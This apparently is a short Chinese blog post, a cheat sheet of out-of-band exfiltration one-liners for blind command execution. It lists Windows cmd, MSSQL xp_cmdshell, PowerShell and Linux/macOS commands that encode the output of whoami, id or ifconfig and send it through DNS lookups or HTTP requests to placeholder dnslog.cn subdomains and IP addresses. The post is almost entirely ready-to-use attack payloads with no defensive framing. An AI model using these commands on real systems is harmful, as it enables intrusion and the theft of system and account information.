各种环境DNS外带回显

1. windows 命令行:

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"

2. mssql:

exec master..xp_cmdshell  "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell  "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";
exec master..xp_cmdshell  "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";

3. windows 通过start外带

for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%X
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn

4. windows powershell

for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);

5. linux/mac 通过ping

ping -c 1 $(whoami).xxx.dnslog.cn

6. linux/mac 通过ping+base64

ping -c 1 $(whoami|base64).xxx.dnslog.cn

7. linux/mac 通过curl

curl http://xx.xx.xx.xx/$(whoami)
curl http://$(whoami).xx.dnslog.cn

8. linux/mac 通过curl+base64

curl http://xx.xx.xx.xx/$(id|base64)
curl http://$(id|base64).xx.dnslog.cn
curl http://xx.xx.xx.xx/$(ifconfig|base64|tr '\n' '-')
posted @ 2021-03-10 15:00  Alad1ng  阅读(483)  评论(0编辑  收藏  举报